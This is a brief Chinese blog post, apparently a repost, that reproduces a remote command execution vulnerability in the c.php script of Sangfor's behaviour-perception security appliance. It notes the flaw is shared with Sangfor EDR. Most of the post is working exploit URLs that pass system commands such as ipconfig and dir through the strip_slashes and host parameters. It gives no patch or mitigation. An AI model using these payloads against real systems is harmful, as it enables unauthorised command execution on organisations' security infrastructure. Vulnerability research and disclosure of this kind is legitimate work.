深信服行为感知命令执行漏洞
1.深信服行为感知漏洞
1.1.漏洞描述
深信服 行为感知系统c.php远程命令执行漏洞,使用与EDR相同模板和部分文件导致命令执行。
1.2.漏洞影响
深信服行为感知系统
1.3.漏洞复现
其实整个过程和深信服EDR命令执行漏洞差不多。
1.3.1.登录页面
1.3.2.构建漏洞URL
其实整个URL和EDR差不多。
URL:https://IP地址/tool/log/c.php?strip_slashes=system&host=ipconfig
1.3.2.1.查询IP地址
URL:https://IP地址/tool/log/c.php?strip_slashes=system&host=ipconfig
1.3.2.2.查询当前目录下文件
URL:https://IP地址/tool/log/c.php?strip_slashes=system&host=dir
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/133416.html
